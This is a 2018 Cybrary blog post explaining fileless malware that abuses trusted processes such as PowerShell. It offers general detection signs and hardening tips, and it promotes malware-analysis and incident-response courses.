Finding Security Against Invisible Malware

April 26, 2018 | Views: 2010

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

We live in a world of possibilities! The Good, the bad, and the ugly anything can happen.

While innovators at Google are working hard to make it easy and safe for people to move around using driverless cars or self-driving cars, hackers, on the other hand, are already making life difficult for people hacking computer systems and stealing their personal and sensitive data using a similar logic – Fileless malware.

Used synonymously with Non-malware or zero footprint malware, Fileless malware has been in existence for many years now; however, as hackers constantly try to use deceptive methods to infiltrate and attack computer systems and networks, this sophisticated technology is becoming increasingly popular in the recent times.

Unlike a traditional malware attack, which requires a code to be written on the hard disk, Zero footprint malware attack uses no code, but legitimate system assets and trusted processes such as memory, PowerShell, etc., to infect victim’s machine. As these are highly trusted processes, most anti-virus software does not even scan them.  Thus offering, an easy and convenient way for hackers to go un-detected hiding behind the trusted process. Also known as, “Living off the Land,” this malware offers more stealth and effectiveness to an attack, and therefore hackers are increasingly using this method to perform their nefarious activities.

A recent study by Ponemon Institute reveals that in the year 2016, about 9% of attacks used this method, which grew to 29% in 2017, and is expected to increase to 35% in the year 2018 significantly raising the alert levels for both individuals and businesses. As non-file malware offers ten times better success rate, hackers are relying on this method to attack computer networks. 

With these types of security attacks on the rise, individuals and businesses need to educate themselves on the style of attacks, and incident response options available to them.

How does a Fileless malware attack take place?

After clicking on a cleverly disguised spam message, the user is taken to a webpage that downloads flash; flash with many vulnerabilities is the preferred choice of smart hackers to infect systems.  

Hackers then use Flash to access PowerShell and send instructions, operating just from computer’s memory, through the command line to download malicious PowerShell script, which collects sensitive data and sends it back to the attacker.

Symptoms of a File less malware Attack

Without a file installed on the computer, even the traditional security tools may find it difficult to detect the presence of a Non-file malware on your computer. However, some warning signs your computer or network displays when infected with an invisible malware include weird network behaviors, computer attempting to connect to botnet servers, etc.

Safeguards against Zero footprint malware attacks

Prevention is better than cure. Identifying an attack in the early stages may help mitigate the risk, here are some steps that help prevent an attack or reduce the damage in the event of an attack.

  • As hackers use existing system resources, to attack your computer, disabling those systems, and process when not in use is an option available to users. Disable PowerShell, Macros, Windows Management Instrumentation, if you are not using them.
  • Always keep the software and patches current and up to date.
  • Constantly monitor security, network, and activity logs
  • Grant privileges and access carefully to credible users
  • Monitor system’s behavior patterns regularly.

Cybersecurity experts at Cybrary, an open-source cyber-security and IT certification preparation platform, offer free education on malware analysis and incident response options available in the event of an attack. Here is a list of courses on understanding malware and incident response handling.

  1. Dynamic Malware Analysis
  2. Intro to Malware Analysis and Reverse Engineering
  3. Incident Response and Advanced Forensics

 

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel